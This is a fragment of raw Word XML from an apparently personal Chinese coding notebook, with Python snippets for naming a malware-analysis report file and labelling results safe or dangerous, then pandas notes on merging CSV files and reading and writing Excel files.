        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恶意代码行为分析报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>({MD5}).docx'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>md5</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>detected_get_character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict_bool</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dict_bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elif  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dict_bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>危险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF249A" w14:textId="77777777" w:rsidR="002953BD" w:rsidRPr="00791C37" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B45D35" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0513B433" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D7DB50" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03661EC8" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0D4F30" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E316B02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="_Toc159779998"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>panda</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p w14:paraId="48E31B85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="_Toc159779999"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据合并</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
    </w:p>
    <w:p w14:paraId="4BA39774" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/weixin_49779629/article/details/115415012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF62AAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D06AD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载第三方库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219FB032" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import pandas as pd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06372BD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9950AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB84BC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df1 = pd.read_csv("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-1.csv")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F9F61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df2 = pd.read_csv("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-2.csv")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD22BC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E6151D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df = pd.concat([df1,df2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4A645" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df.drop_duplicates()  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据去重</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B6966" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存合并后的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A776111" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>df.to_csv('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.csv',encoding = 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3C269" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7B15AA" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B747C2" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7248B763" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB04FF7" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_Toc159780000"/>
      <w:r>
        <w:t>excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:p w14:paraId="08F8B271" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E24841" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFAD016" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:t>https://zhuanlan.zhihu.com/p/82200512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070DBA1B" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A956AE" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F25E1" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlrd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（两个库都得安装）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写，这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只能是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xls</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D0C51" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9E689F" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41209CDD" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRPr="00CA29C3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>openpyxl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，注意这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只能是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA29C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EA2EE" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A426A1" w14:textId="77777777" w:rsidR="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54235817" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C19B72A" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB55472" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D822BDE" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751875BF" w14:textId="77777777" w:rsidR="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2F4CAB" w14:textId="77777777" w:rsidR="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CCB1B9" w14:textId="77777777" w:rsidR="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672D335D" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRPr="00063FAB" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
